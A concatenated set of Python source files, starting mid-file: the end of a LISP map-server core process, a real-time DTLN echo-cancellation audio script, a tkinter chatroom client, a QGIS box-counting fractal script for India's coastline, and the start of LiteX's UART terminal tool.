        if (line == "" or line[0] == "#"): continue
        if (line.find("decentralized-xtr = yes") == -1): continue
        decent_xtr = True
        break
    #endfor
    if (decent_xtr == False): return

    #
    # Check if "lisp map-server" command clauses have multicast addresses
    # configured.
    #
    groups = []
    in_clause = False
    for line in lines:
        if (line[0:2] == "#-" and line[-2:] == "-#"): break
        if (line == "" or line[0] == "#"): continue
        if (line.find("lisp map-server") != -1):
            in_clause = True
            continue
        #endif
        if (line[0] == "}"):
            in_clause = False
            continue
        #endif

        #
        # Parse address. Look at high-order byte for the IPv4 multicast
        # range 224.0.0.0 - 239.255.255.255.
        #
        if (in_clause and line.find("address = ") != -1):
            group = line.split("address = ")[1]
            ho_byte = int(group.split(".")[0])
            if (ho_byte >= 224 and ho_byte < 240): groups.append(group)
        #endif
    #endfor

    #
    # Fixed: test the list "groups"; the original tested "group", which is
    # unbound (NameError) when no address lines were seen.
    #
    if (groups == []): return

    #
    # Find eth0 IP address to use as the multicast interface address.
    #
    out = commands.getoutput('ifconfig eth0 | egrep "inet "')
    if (out == ""): return
    intf_addr = out.split()[1]

    #
    # Join each multicast group on lisp_socket so multicast Map-Register
    # messages are received.
    #
    i = socket.inet_aton(intf_addr)
    for group in groups:
        lisp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, i)
        g = socket.inet_aton(group) + i
        lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, g)
        lisp.lprint("Setting multicast listen socket for group {}".format( \
            group))
    #endfor
    return
#enddef
#------------------------------------------------------------------------------
# Optional first command-line argument overrides the bottle web-UI port.
bottle_port = int(sys.argv[1]) if (len(sys.argv) > 1) else 8080
#
# Main entry point for process.
#
if (lisp_core_startup(bottle_port) == False):
    lisp.lprint("lisp_core_startup() failed")
    lisp.lisp_print_banner("lisp-core abnormal exit")
    exit(1)
#endif
while (True):
    #
    # Process either commands, an IPC data-packet (for testing), or any
    # protocol message on the IPC listen socket. An empty source means the
    # socket was closed, so fall through to a clean shutdown.
    #
    opcode, source, port, packet = \
        lisp.lisp_receive(lisp_control_listen_socket, False)
    if (source == ""): break
    #
    # Process received network packet (source arrives as an IPv6-mapped
    # address on the udp46 socket; convert back to IPv4 when applicable).
    #
    source = lisp.lisp_convert_6to4(source)
    lisp_core_dispatch_packet(lisp_sockets, source, port, packet)
#endwhile
lisp_core_shutdown()
lisp.lisp_print_banner("lisp-core normal exit")
exit(0)
|
aec_mp.py | # -*- coding: utf-8 -*-
"""
Script to process realtime audio with a trained DTLN-aec model.
This script directly interacts with audio devices. It expects 16kHz audio input/output.
Input device should contain a loopback channel as its last channel, and it assume raw mic input is in the first channel.
Example call:
$python rt_dtln_aec_mp.py -i capture -o playback -m /name/of/the/model
Author: sanebow (sanebow@gmail.com)
Version: 23.05.2021
This code is licensed under the terms of the MIT-license.
"""
import soundfile as sf
import sounddevice as sd
import numpy as np
import time
import argparse
import tflite_runtime.interpreter as tflite
from multiprocessing import Process, Queue
import threading
import collections
import daemon
import sys
try:
from multiprocessing import shared_memory
except ImportError:
try:
import shared_memory
except ImportError:
print("[ERROR] please install shared-memory38 on Python < 3.8")
exit(1)
g_use_fftw = True
try:
import pyfftw
except ImportError:
print("[WARNING] pyfftw is not installed, use np.fft")
g_use_fftw = False
def int_or_str(text):
    """Return int(text) when text parses as an integer, else text itself.

    Lets a CLI option accept either a numeric device ID or a name string.
    """
    try:
        value = int(text)
    except ValueError:
        value = text
    return value
def fetch_shm_ndarray(name, shape, dtype='float32', init=False):
    """Map a numpy array onto a named shared-memory segment.

    With init=True a new segment is created and zero-filled; otherwise an
    existing segment of that name is attached. Returns (array, shm); keep
    the shm handle alive, it owns the underlying mapping.
    """
    template = np.zeros(shape).astype(dtype)
    if init:
        shm = shared_memory.SharedMemory(name=name, create=True,
                                         size=template.nbytes)
    else:
        shm = shared_memory.SharedMemory(name=name)
    arr = np.ndarray(template.shape, dtype=template.dtype, buffer=shm.buf)
    if init:
        arr[:] = template[:]
    return arr, shm
# First pass: handle -l/--list-devices alone so it works without the other
# (otherwise required) options.
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-l', '--list-devices', action='store_true',
                    help='show list of audio devices and exit')
args, remaining = parser.parse_known_args()
if args.list_devices:
    print(sd.query_devices())
    parser.exit(0)
# Second pass: full argument parser, inheriting the first as a parent.
parser = argparse.ArgumentParser(
    description=__doc__,
    formatter_class=argparse.RawDescriptionHelpFormatter,
    parents=[parser])
parser.add_argument("--input_device", "-i", type=int_or_str, help="input device (numeric ID or substring)")
parser.add_argument("--output_device", "-o", type=int_or_str, help="output device (numeric ID or substring)")
parser.add_argument("--model", "-m", choices=['128', '256', '512'], default='256', help="number of LSTM units for tf-lite model (one of 128, 256, 512)")
parser.add_argument("--channels", "-c", type=int, default=2, help="number of input channels")
parser.add_argument('--no-aec', '-n', action='store_true', help='turn off AEC, pass-through')
parser.add_argument("--latency", type=float, default=0.2, help="latency of sound device")
parser.add_argument("--threads", type=int, default=1, help="set thread number for interpreters")
parser.add_argument('--measure', action='store_true', help='measure and report processing time')
parser.add_argument('--no-fftw', action='store_true', help='use np.fft instead of fftw')
parser.add_argument('--save', '-s', action='store_true', help='save input and output audio files (wav)')
parser.add_argument('-D', '--daemonize', action='store_true',help='run as a daemon')
args = parser.parse_args(remaining)
# set block len and block shift (512-sample FFT window, 128-sample hop)
block_len = 512
block_shift = 128
# Stage-1 model runs in this (audio callback) process.
interpreter_1 = tflite.Interpreter(
    model_path="models/dtln_aec_{}_quant_1.tflite".format(args.model), num_threads=args.threads)
interpreter_1.allocate_tensors()
input_details_1 = interpreter_1.get_input_details()
# NOTE(review): these are tensor *index* values taken from the details
# dicts, but elsewhere they are also used as positions into the details
# list (e.g. input_details_1[states_idx]); that only works when the two
# numberings coincide -- confirm for these models.
in_idx = next(i for i in input_details_1 if i["name"] == "input_3")["index"]
lpb_idx = next(i for i in input_details_1 if i["name"] == "input_4")["index"]
states_idx = next(i for i in input_details_1 if i["name"] == "input_5")["index"]
output_details_1 = interpreter_1.get_output_details()
states_1 = np.zeros(input_details_1[states_idx]["shape"]).astype("float32")
# Stage-2 model is handed to the separate stage2 worker process.
interpreter_2 = tflite.Interpreter(
    model_path="models/dtln_aec_{}_quant_2.tflite".format(args.model), num_threads=args.threads)
interpreter_2.allocate_tensors()
# Sliding input/output windows for the overlap-add processing.
in_buffer = np.zeros((block_len)).astype("float32")
in_buffer_lpb = np.zeros((block_len)).astype("float32")
out_buffer = np.zeros((block_len)).astype('float32')
# Shared-memory blocks used to exchange data with the stage-2 process.
in_lpb, _shm1 = fetch_shm_ndarray('in_lpb', (1, 1, block_len), init=True)
est_block, _shm2 = fetch_shm_ndarray('est_block', (1, 1, block_len), init=True)
out_block, _shm3 = fetch_shm_ndarray('out_block', (block_len), init=True)
shms = [_shm1, _shm2, _shm3]
# One-slot queue acts as a rendezvous between stage 1 and stage 2.
q = Queue(maxsize=1)
if g_use_fftw:
    # Pre-planned FFTW transforms reused on every callback.
    fft_buf = pyfftw.empty_aligned(512, dtype='float32')
    rfft = pyfftw.builders.rfft(fft_buf)
    ifft_buf = pyfftw.empty_aligned(257, dtype='complex64')
    irfft = pyfftw.builders.irfft(ifft_buf)
if args.save:
    in_wav = sf.SoundFile('/tmp/aec_in.wav', 'w', 16000, 2)
    out_wav = sf.SoundFile('/tmp/aec_out.wav', 'w', 16000, 1)
# Ring of recent per-callback processing times for --measure reporting.
t_ring = collections.deque(maxlen=512)
# =========== stage 1 =============
def callback(indata, outdata, frames, buftime, status):
    """sounddevice duplex callback: run DTLN-aec stage 1 for each hop.

    Mic samples are taken from channel 0 of *indata*, the loopback
    (playback) reference from its last channel. The stage-1 estimate is
    handed to the stage-2 process via shared memory; q.get() waits for the
    previous stage-2 result before the output block is assembled.
    """
    global in_buffer, out_buffer, in_buffer_lpb, states_1, g_use_fftw
    if args.measure:
        start_time = time.time()
    if status:
        print(status)
    if args.no_aec:
        # Pass-through mode: copy mic straight to the output, no AEC.
        # time.sleep(max(0, np.random.normal(loc=6.0, scale=1.0)*1e-3))
        outdata[:, 0] = indata[:, 0]
        if args.measure:
            t_ring.append(time.time() - start_time)
        return
    # write mic stream to buffer (slide the 512-sample window by one
    # 128-sample hop)
    in_buffer[:-block_shift] = in_buffer[block_shift:]
    in_buffer[-block_shift:] = np.squeeze(indata[:, 0])
    # write playback stream to buffer
    in_buffer_lpb[:-block_shift] = in_buffer_lpb[block_shift:]
    in_buffer_lpb[-block_shift:] = np.squeeze(indata[:, -1])
    # calculate fft of input block
    if g_use_fftw:
        fft_buf[:] = in_buffer
        in_block_fft = rfft().astype("complex64")
    else:
        in_block_fft = np.fft.rfft(in_buffer).astype("complex64")
    # create magnitude
    in_mag = np.abs(in_block_fft)
    in_mag = np.reshape(in_mag, (1, 1, -1)).astype("float32")
    # magnitude spectrum of the loopback block
    if g_use_fftw:
        fft_buf[:] = in_buffer_lpb
        lpb_block_fft = rfft().astype("complex64")
    else:
        lpb_block_fft = np.fft.rfft(in_buffer_lpb).astype("complex64")
    lpb_mag = np.abs(lpb_block_fft)
    lpb_mag = np.reshape(lpb_mag, (1, 1, -1)).astype("float32")
    # set tensors to the first model
    # NOTE(review): in_idx/lpb_idx/states_idx are tensor indices but are
    # used here as list positions -- works only if the numberings agree.
    interpreter_1.set_tensor(input_details_1[in_idx]["index"], in_mag)
    interpreter_1.set_tensor(input_details_1[lpb_idx]["index"], lpb_mag)
    interpreter_1.set_tensor(input_details_1[states_idx]["index"], states_1)
    # run calculation
    interpreter_1.invoke()
    # get the spectral mask and the recurrent state of the first model
    out_mask = interpreter_1.get_tensor(output_details_1[0]["index"])
    states_1 = interpreter_1.get_tensor(output_details_1[1]["index"])
    # apply mask and calculate the ifft
    if g_use_fftw:
        ifft_buf[:] = in_block_fft * out_mask
        estimated_block = irfft()
    else:
        estimated_block = np.fft.irfft(in_block_fft * out_mask)
    # publish the time-domain frames for the stage-2 process via the
    # shared-memory blocks
    in_lpb[:] = np.reshape(in_buffer_lpb, (1, 1, -1)).astype("float32")
    est_block[:] = np.reshape(estimated_block, (1, 1, -1)).astype("float32")
    q.get() # get stage2 output (synchronizes with q.put(1) in stage2)
    # overlap-add: shift the output buffer by one hop and add the new
    # stage-2 block
    out_buffer[:-block_shift] = out_buffer[block_shift:]
    out_buffer[-block_shift:] = np.zeros((block_shift))
    out_buffer += np.squeeze(out_block)
    # output to soundcard
    outdata[:] = np.expand_dims(out_buffer[:block_shift], axis=-1)
    if args.measure:
        dt = time.time() - start_time
        t_ring.append(dt)
        if dt > 8e-3:
            # one 128-sample hop at 16 kHz is an 8 ms real-time budget
            print("[warning] process time: {:.2f} ms".format(dt * 1000))
    if args.save:
        in_wav.write(indata)
        out_wav.write(outdata)
def stage2(interpreter_2, q):
    """Stage-2 worker process for DTLN-aec.

    Attaches to the shared-memory blocks created by the parent, then loops
    forever: run the second model on (loopback, stage-1 estimate), write
    the result into out_block, and signal completion through the queue.
    """
    input_details_2 = interpreter_2.get_input_details()
    # NOTE(review): same tensor-index-as-list-position pattern as stage 1.
    est_idx = next(i for i in input_details_2 if i["name"] == "input_6")["index"]
    lpb_idx = next(i for i in input_details_2 if i["name"] == "input_7")["index"]
    states_idx = next(i for i in input_details_2 if i["name"] == "input_8")["index"]
    output_details_2 = interpreter_2.get_output_details()
    states_2 = np.zeros(input_details_2[states_idx]["shape"]).astype("float32")
    block_len = 512
    # Attach (init=False) to the segments the parent created.
    in_lpb, _shm1 = fetch_shm_ndarray('in_lpb', (1, 1, block_len))
    est_block, _shm2 = fetch_shm_ndarray('est_block', (1, 1, block_len))
    out_block, _shm3 = fetch_shm_ndarray('out_block', (block_len))
    q.put(0) # tell another process am ready
    q.put(0) # let stage1 go first (queue holds one item, so this blocks
             # until the parent consumes the readiness token)
    while True:
        # set tensors to the second block
        interpreter_2.set_tensor(input_details_2[lpb_idx]["index"], in_lpb)
        interpreter_2.set_tensor(input_details_2[est_idx]["index"], est_block)
        interpreter_2.set_tensor(input_details_2[states_idx]["index"], states_2)
        # run calculation
        interpreter_2.invoke()
        # get output tensors
        out_block[:] = interpreter_2.get_tensor(output_details_2[0]["index"])
        states_2 = interpreter_2.get_tensor(output_details_2[1]["index"])
        q.put(1) # output ready
def open_stream():
    """Open the duplex audio stream and block forever; with --measure,
    print rolling processing-time statistics once per second instead."""
    stream = sd.Stream(device=(args.input_device, args.output_device),
                       samplerate=16000, blocksize=block_shift,
                       dtype=np.float32, latency=args.latency,
                       channels=(args.channels, 1), callback=callback)
    with stream:
        banner = '#' * 80
        print(banner)
        print('Ctrl-C to exit')
        print(banner)
        if not args.measure:
            # Sleep forever; all work happens in the audio callback.
            threading.Event().wait()
            return
        while True:
            time.sleep(1)
            print('Processing time: {:.2f} ms, std={:.2f}'.format(
                1000 * np.average(t_ring), 1000 * np.std(t_ring)
            ), end='\r')
try:
    # Launch the stage-2 worker before opening the audio stream so it is
    # attached and ready when the first callback fires.
    p2 = Process(target=stage2, args=(interpreter_2, q))
    p2.start()
    q.get() # wait till stage2 process ready
    if args.daemonize:
        with daemon.DaemonContext():
            open_stream()
    else:
        open_stream()
except KeyboardInterrupt:
    print("Keyboard interrupt, terminating ...")
except Exception as e:
    # NOTE(review): this clause only re-raises; it exists to fall through
    # to the cleanup below rather than to handle anything.
    raise
finally:
    # Release shared memory and stop the worker on every exit path.
    for shm in shms:
        shm.close()
        shm.unlink()
    p2.terminate()
    p2.join()
    if args.save:
        in_wav.flush()
        in_wav.close()
        out_wav.flush()
        out_wav.close()
chatroom.py | ################################################################################
## author: Lucas santos
## version: 1.0
## Python 3.6.5 | UTF-8
from tkinter import *
import socket
from threading import Thread
from random import randint
from time import sleep
################################################################################
# Global variables
nickname = 'User' + str(randint(10000, 99999))
################################################################################
class Login(LabelFrame):
    # Login window: asks the user for a nickname (4 to 20 characters) and
    # publishes it in the module-level `nickname` variable.
    def __init__(self, master, appName):
        super().__init__(master)
        # Root window setup
        self.master = master
        self.master.geometry('500x400')
        self.master.resizable(height=False, width=False)
        self.master['bg'] = '#252525'
        # Frame setup
        self.appName = appName
        self.config(text=self.appName, width=450, height=370,
                    padx=15, pady=15)
        self.pack_propagate(False)
        self['fg'] = '#999999'
        self['bg'] = '#252525'
        # Widgets, packed top to bottom
        banner = Label(self, text='Welcome!',
                       font=('Lucida Grande', 44),
                       fg='#999999', bg='#252525')
        banner.pack(pady=50)
        prompt = Label(self, text='Nickname:',
                       fg='#999999', bg='#252525')
        prompt.pack()
        self.nicknameEntry = Entry(self, fg='#999999', bg='#353535')
        self.nicknameEntry.pack()
        submit = Button(self, text='Login', command=self.getNickname,
                        width=16, height=1,
                        fg='#999999', bg='#353535', bd=3)
        submit.pack()
        self.warningLabel = Label(self, fg='#999999', bg='#252525')
        self.warningLabel.pack(pady=30)
        self.pack(padx=8, pady=8)
    # Validate the entry; on success store the nickname globally and close
    # the window, otherwise show why it was rejected.
    def getNickname(self):
        global nickname
        candidate = self.nicknameEntry.get()
        if candidate == '':
            complaint = 'Please, choose your nickname.'
        elif len(candidate) < 4:
            complaint = 'Too small nickname.'
        elif len(candidate) > 20:
            complaint = 'Too long nickname.'
        else:
            nickname = candidate
            self.master.destroy()
            return
        self.warningLabel['text'] = complaint
################################################################################
class ChatRoom(LabelFrame):
    # Chat window: a read-only transcript, a text box and an ENTER button.
    # All networking runs on a daemon thread so the GUI never blocks.
    def __init__(self, master, appName, nickname, serverIp, serverPort):
        super().__init__(master)
        # Identity and connection state
        self.nickname = nickname
        self.connected = False
        self.serverIp = serverIp
        self.serverPort = serverPort
        self.server = None
        # Root window setup
        self.master = master
        self.master.geometry('800x550')
        self.master.resizable(height=False, width=False)
        self.master['bg'] = '#252525'
        # Frame setup
        self.appName = appName
        self.config(text=self.appName)
        self['fg'] = '#999999'
        self['bg'] = '#252525'
        # Transcript area (kept DISABLED so the user cannot type in it)
        self.chatText = Text(self, width=95, height=27,
                             fg='#999999', bg='#454545',
                             bd=3, state=DISABLED)
        self.chatText.pack(padx=5, pady=5, fill=BOTH, expand=1)
        self.chatText.pack_propagate(False)
        scrollbar = Scrollbar(self.chatText, command=self.chatText.yview)
        scrollbar.pack(side='right', fill=Y)
        self.chatText.config(yscrollcommand=scrollbar.set)
        # Message input
        self.textBox = Text(self, width=83, height=3,
                            fg='#999999', bg='#353535', bd=3)
        self.textBox.pack(side='left', padx=5, pady=5)
        sendButton = Button(self, text='ENTER', command=self.onEnter,
                            width=10, height=3,
                            fg='#999999', bg='#353535', bd=3)
        sendButton.pack(side='right', padx=5, pady=5)
        self.pack(padx=8, pady=8)
        # Background networking loop
        Thread(target=self.serverConnect, daemon=True).start()
    # Append a message to the transcript, re-enabling it temporarily.
    def chatInsert(self, message):
        self.chatText['state'] = NORMAL
        self.chatText.insert(INSERT, message)
        self.chatText['state'] = DISABLED
        self.chatText.see('end')
    # Echo the typed line locally and forward it to the server when online.
    def onEnter(self):
        typed = self.textBox.get('1.0', END)
        self.textBox.delete('1.0', END)
        line = '{}: {}'.format(self.nickname, typed)
        self.chatInsert(line)
        if not self.connected:
            return
        self.server.send(line.replace('\n', '').encode('utf8'))
    # (Re)connect forever: establish the link, register the nickname, then
    # pump incoming messages into the transcript until the link drops.
    def serverConnect(self):
        divider = '=' * 95 + '\n'
        self.chatInsert(divider)
        self.chatInsert('Welcome {}!\n'.format(self.nickname))
        self.chatInsert('Trying to connect to the server.\n')
        while True:
            self.connectLoop()
            self.chatInsert('Connected!\n')
            self.chatInsert(divider)
            sleep(1)
            try:
                self.server.send(self.nickname.encode('utf8'))
            except:
                self.chatInsert(divider)
                self.chatInsert('Connection lost.\n')
                self.connected = False
            while self.connected:
                try:
                    incoming = self.server.recv(4096).decode('utf8')
                    self.chatInsert(incoming + '\n')
                except:
                    self.chatInsert(divider)
                    self.chatInsert('Connection lost.\n')
                    self.connected = False
    # Retry until a TCP connection is established.
    def connectLoop(self):
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        while True:
            try:
                self.server.connect((self.serverIp, self.serverPort))
                self.connected = True
                return
            except:
                self.chatInsert('Error when trying to connect to the server.\n')
                sleep(1)
################################################################################
def main():
    # Run the login dialog first, then open the chat room using the
    # nickname it stored.
    loginTitle = '+Login+'
    chatTitle = '+ChatRoom+'
    # If you want to use a PUBLIC IP, you need to configure your network.
    SERVER_IP = '' # Paste your ip here
    SERVER_PORT = 4444
    loginWindow = Tk(className=loginTitle)
    loginApp = Login(loginWindow, loginTitle)
    loginApp.mainloop()
    chatWindow = Tk(className=chatTitle)
    chatApp = ChatRoom(chatWindow, chatTitle, nickname, SERVER_IP, SERVER_PORT)
    chatApp.mainloop()
main()
|
Box-Method.py | # This PROGRAM calculates the fractal dimension of the coastline and border of India using the box counting method.
#
# The features/boxes of grid are distributed between the nodes and each node distributes features between its cores.
# At each core, the function : counter() is executed and results are stored in a Multiprocessing array and summated to get the count of boxes.
#
# The maps and shapefiles are taken from GADM (https://gadm.org/download_country_v3.html)
#
# Authors: Jaideep Reddy, Deepika Bisht (BML Munjal University Gurgaon, India)
#
# Last Modified:18-07-2021
#importing multiprocessing libraries
from timeit import default_timer as dt
import numpy as np
from multiprocessing import Process,Array,Value
#provide the following
#provide the following
cores = 18 # no of cores used on this node
nodes = 4 # no of nodes the grid features are split across
gsize = 0.5 # grid size (recorded in the results file)
node = 0 # node number (0-based index of this node)
st = dt() # wall-clock start, for the timing report
# NOTE(review): QgsProject / QgsFeatureRequest come from the QGIS Python
# console -- this script must run inside QGIS. The layer-index assumption
# (index 1 = map layer, index 0 = grid layer) depends on project order.
veckey = list(QgsProject.instance().mapLayers().keys())[1] # Get the key for map/india layer
instancelayer = QgsProject.instance().mapLayers()[veckey] # Use key to get the map/india layer
key = list(QgsProject.instance().mapLayers().keys())[0] # Get the key for grid layer
grid = QgsProject.instance().mapLayers()[key] # Use grid key to get the grid layer
# This function : counter() returns the count of boxes that contains a part of coastline / intersects with coastline.
def counter(gridfts, instvectors, arr, i):
    # Count, over the given grid features, how many map features intersect
    # each one, and publish the total at slot i of the shared
    # multiprocessing array. Note: every intersecting (cell, map-feature)
    # pair contributes one count.
    total = 0
    for cell in gridfts:
        # Only examine map features whose bounding box overlaps this cell.
        request = QgsFeatureRequest().setFilterRect(cell.geometry().boundingBox())
        for candidate in instvectors.getFeatures(request):
            if cell.geometry().intersects(candidate.geometry()):
                total += 1
    arr[i] = total
gfeats = np.array(list(grid.getFeatures())) # Get the list of grid layer features
gsubs = np.array_split(gfeats, nodes) # Split the features list between the nodes
subs = np.array_split(gsubs[node], cores) # Take the features of current node and split them into no of cores
procs_list = []
arr = Array('i', range(cores)) # Multiprocessing array to store results from each core
for i, sub in enumerate(subs):
    proc = Process(target=counter, args=(sub, instancelayer.clone(), arr, i)) # Create process to count the intersections
    procs_list.append(proc) # Add process to the procs_list
    proc.start() # Start process
#
# BUG FIX: the join loop iterated over an undefined name "threads"
# (NameError at runtime); it must wait on the processes collected in
# procs_list above.
#
for proc in procs_list:
    proc.join() # Wait till all processes end (join)
count = sum(arr) # Sum all intersection counts from all cores
ctime = dt() - st
# Append the results for this node and grid size to the report file.
with open("//home//qgis//indiaresults.txt", "a+") as f:
    f.write("grid size : " + str(gsize) + "\n")
    f.write("node : " + str(node) + "\n")
    f.write("count : " + str(count) + "\n")
    f.write("time : " + str(ctime) + "\n\n")
|
litex_term.py | #!/usr/bin/env python3
#
# This file is part of LiteX.
#
# Copyright (c) 2015-2020 Florent Kermarrec <florent@enjoy-digital.fr>
# Copyright (c) 2015 Sebastien Bourdeauducq <sb@m-labs.hk>
# Copyright (c) 2016 whitequark <whitequark@whitequark.org>
# SPDX-License-Identifier: BSD-2-Clause
import sys
import signal
import os
import time
import serial
import threading
import multiprocessing
import argparse
import json
import socket
# Console ------------------------------------------------------------------------------------------
if sys.platform == "win32":
    import ctypes
    import msvcrt
    class Console:
        """Raw-keyboard console for Windows (msvcrt based)."""
        def configure(self):
            # https://stackoverflow.com/a/36760881
            # ENABLE_VIRTUAL_TERMINAL_PROCESSING: let the console interpret
            # the ANSI escape sequences the target emits.
            kernel32 = ctypes.windll.kernel32
            kernel32.SetConsoleMode(kernel32.GetStdHandle(-11), 7)
        def unconfigure(self):
            # Nothing to restore on Windows.
            pass
        def getkey(self):
            return msvcrt.getch()
        # getch doesn't return Virtual Keycodes, but rather
        # PS/2 Scan Codes. Keycodes starting with 0xE0 are
        # worth handling.
        def escape_char(self, b):
            return b == b"\xe0"
        def handle_escape(self, b):
            # Map PS/2 scan codes to the equivalent ANSI escape sequences.
            return {
                b"H" : b"\x1b[A", # Up
                b"P" : b"\x1b[B", # Down
                b"K" : b"\x1b[D", # Left
                b"M" : b"\x1b[C", # Right
                b"G" : b"\x1b[H", # Home
                b"O" : b"\x1b[F", # End
                b"R" : b"\x1b[2~", # Insert
                b"S" : b"\x1b[3~", # Delete
            }.get(b, None) # TODO: Handle ESC? Others?
else:
    import termios
    import pty
    class Console:
        """Raw-keyboard console for POSIX (termios based)."""
        def __init__(self):
            self.fd = sys.stdin.fileno()
            # Saved so unconfigure() can restore the terminal on exit.
            self.default_settings = termios.tcgetattr(self.fd)
        def configure(self):
            # Disable canonical mode and echo: deliver single keystrokes
            # immediately (VMIN=1, VTIME=0) without local echo.
            settings = termios.tcgetattr(self.fd)
            settings[3] = settings[3] & ~termios.ICANON & ~termios.ECHO
            settings[6][termios.VMIN] = 1
            settings[6][termios.VTIME] = 0
            termios.tcsetattr(self.fd, termios.TCSANOW, settings)
        def unconfigure(self):
            termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.default_settings)
        def getkey(self):
            return os.read(self.fd, 1)
        def escape_char(self, b):
            # POSIX terminals already produce ANSI sequences; no translation.
            return False
        def handle_escape(self, b):
            return None
# Crossover UART -------------------------------------------------------------------------------------
from litex import RemoteClient
class CrossoverUART:
    """PTY bridge to a LiteX crossover UART reached over the CSR bus.

    Two helper processes shuttle bytes between a locally created pty and
    the design's rx/tx CSRs (found by the *name* prefix in the CSR map).
    POSIX-only: relies on the `pty` module imported in the non-win32
    branch above.
    """
    def __init__(self, name="uart_xover", host="localhost", base_address=None, csr_csv=None):
        self.bus = RemoteClient(host=host, base_address=base_address, csr_csv=csr_csv)
        # Lift the "<name>_*" CSRs up as attributes (rxtx, rxempty, ...).
        present = False
        for k, v in self.bus.regs.d.items():
            if f"{name}_" in k:
                setattr(self, k.replace(f"{name}_", ""), v)
                present = True
        if not present:
            raise ValueError(f"CrossoverUART {name} not present in design.")
        # FIXME: On PCIe designs, CSR is remapped to 0 to limit BAR0 size.
        if base_address is None and hasattr(self.bus.bases, "pcie_phy"):
            self.bus.base_address = -self.bus.mems.csr.base
    def open(self):
        # Open the bus and the pty, then start the two forwarding processes.
        self.bus.open()
        self.file, self.name = pty.openpty()
        self.pty2crossover_thread = multiprocessing.Process(target=self.pty2crossover)
        self.crossover2pty_thread = multiprocessing.Process(target=self.crossover2pty)
        self.pty2crossover_thread.start()
        self.crossover2pty_thread.start()
    def close(self):
        self.bus.close()
        self.pty2crossover_thread.terminate()
        self.crossover2pty_thread.terminate()
    def pty2crossover(self):
        # Forward bytes typed into the pty to the design, one at a time.
        while True:
            r = os.read(self.file, 1)
            self.rxtx.write(ord(r))
    def crossover2pty(self):
        # Drain the design into the pty: read 16 bytes when rxfull is set,
        # 1 byte when rxempty is clear, otherwise back off for 1 ms.
        while True:
            if self.rxfull.read():
                length = 16
            elif not self.rxempty.read():
                length = 1
            else:
                time.sleep(1e-3)
                continue
            r = self.bus.read(self.rxtx.addr, length=length, burst="fixed")
            for v in r:
                os.write(self.file, bytes(chr(v).encode("utf-8")))
# JTAG UART ----------------------------------------------------------------------------------------
from litex.build.openocd import OpenOCD
class JTAGUART:
    """PTY bridge to a JTAG UART tunneled through an OpenOCD TCP stream.

    jtag2tcp runs OpenOCD in stream mode, which serves the JTAG UART on a
    local TCP port; two further processes copy bytes between that socket
    and a locally created pty. POSIX-only (uses the `pty` module).
    """
    def __init__(self, config="openocd_xc7_ft2232.cfg", port=20000, chain=1):
        self.config = config
        self.port = port
        self.chain = chain
    def open(self):
        self.file, self.name = pty.openpty()
        # Start the OpenOCD bridge first and give it time to bind the port
        # before connecting to it.
        self.jtag2tcp_thread = multiprocessing.Process(target=self.jtag2tcp)
        self.jtag2tcp_thread.start()
        time.sleep(0.5)
        self.pty2tcp_thread = multiprocessing.Process(target=self.pty2tcp)
        self.tcp2pty_thread = multiprocessing.Process(target=self.tcp2pty)
        self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.tcp.connect(("localhost", self.port))
        self.pty2tcp_thread.start()
        self.tcp2pty_thread.start()
    def close(self):
        self.jtag2tcp_thread.terminate()
        self.pty2tcp_thread.terminate()
        self.tcp2pty_thread.terminate()
    def jtag2tcp(self):
        # Run OpenOCD with the given config, streaming the JTAG chain's
        # UART over TCP on self.port.
        prog = OpenOCD(self.config)
        prog.stream(self.port, self.chain)
    def pty2tcp(self):
        # Forward keystrokes from the pty to OpenOCD, byte by byte.
        while True:
            r = os.read(self.file, 1)
            self.tcp.send(r)
    def tcp2pty(self):
        # Forward target output from OpenOCD back into the pty.
        while True:
            r = self.tcp.recv(1)
            os.write(self.file, bytes(r))
# Intel/Altera JTAG UART via nios2-terminal
class Nios2Terminal():
    """Intel/Altera JTAG UART bridge via the external nios2-terminal tool."""
    def __init__(self):
        from subprocess import Popen, PIPE
        self.p = Popen("nios2-terminal", stdin=PIPE, stdout=PIPE)
    def read(self):
        return self.p.stdout.read(1)
    def in_waiting(self):
        # unfortunately p.stdout does not provide
        # information about awaiting input
        return False
    def write(self, data):
        if data is None:
            return
        self.p.stdin.write(data)
        try:
            self.p.stdin.flush()
        except BrokenPipeError:
            print("nios2-terminal has terminated, exiting...\n")
            sys.exit(1)
    def close(self):
        self.p.terminate()
# SFL ----------------------------------------------------------------------------------------------
# Serial flashing-loader (SFL) protocol constants; presumably mirrored by
# the BIOS side of the protocol -- keep in sync with it.
sfl_prompt_req = b"F7: boot from serial\n"
sfl_prompt_ack = b"\x06"
sfl_magic_req = b"sL5DdSMmkekro\n"
sfl_magic_ack = b"z6IHG7cYDID6o\n"
sfl_payload_length = 255
# General commands
sfl_cmd_abort = b"\x00"
sfl_cmd_load = b"\x01"
sfl_cmd_jump = b"\x02"
# Replies (single ACK bytes returned by the device after each frame)
sfl_ack_success = b"K"
sfl_ack_crcerror = b"C"
sfl_ack_unknown = b"U"
sfl_ack_error = b"E"
class SFLFrame:
    """One serial-loader frame: a command byte plus payload.

    Wire format produced by encode():
    [payload length][crc16 big-endian][cmd][payload].
    """
    def __init__(self):
        self.cmd = bytes()
        self.payload = bytes()
    def compute_crc(self):
        # The CRC covers both the command byte and the payload.
        return crc16(self.cmd + self.payload)
    def encode(self):
        header = bytes([len(self.payload)])
        header += self.compute_crc().to_bytes(2, "big")
        return header + self.cmd + self.payload
# CRC16 --------------------------------------------------------------------------------------------
crc16_table = [
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
